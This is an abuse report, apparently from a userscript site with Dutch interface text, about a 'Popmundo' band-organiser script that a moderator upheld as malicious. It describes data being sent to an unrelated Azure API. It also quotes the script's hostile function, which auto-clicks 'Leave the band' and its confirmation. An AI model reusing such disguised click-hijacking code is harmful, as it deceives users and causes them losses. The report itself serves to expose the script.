Popmundo The Fastest Band Organiser is op 18-11-2024 gemeld omwille van Ontbrekende, onduidelijke of misleidende omschrijving
The script claims to help users organize their bands. However, it is a malicious script as it collects user data from the game and sends it to a Web API hosted on Azure, which does not belong to the official owner of the platform where it is used.
When the user visits the page where the script operates, it completely deceives them. Users expect a script that would assist in organizing their bands on the game Popmundo.com. Instead, it makes the player leave their band, which could lead to significant losses, even financial, for the user. I kindly request that you investigate this report.
This is the malicious part of the script:
function checkIfArtistPage() {
if (window.location.href.includes("/World/Popmundo.aspx/Artist/Members/")) {
// Clicks the "Leave the band" button
document.getElementById("ctl00_cphLeftColumn_ctl01_repMembers_ctl00_ucAM_btnQuit").click();
setTimeout(function() {
var info = document.getElementsByClassName("ui-button ui-corner-all ui-widget");
setTimeout(function() {
try {
// Attempts to click the confirmation button
info[7].click();
} catch (ex) {
// If the expected button doesn't exist, clicks another button as an alternative
info[1].click();
}
}, 250);
}, 250);
}
}
Dit script bevat 1 eerdere (on)opgeloste melding.
Sean Sikimić (de gebruiker waarvan melding is gemaakt) heeft het volgende gedaan:
Deze melding is gehandhaafd door een moderator.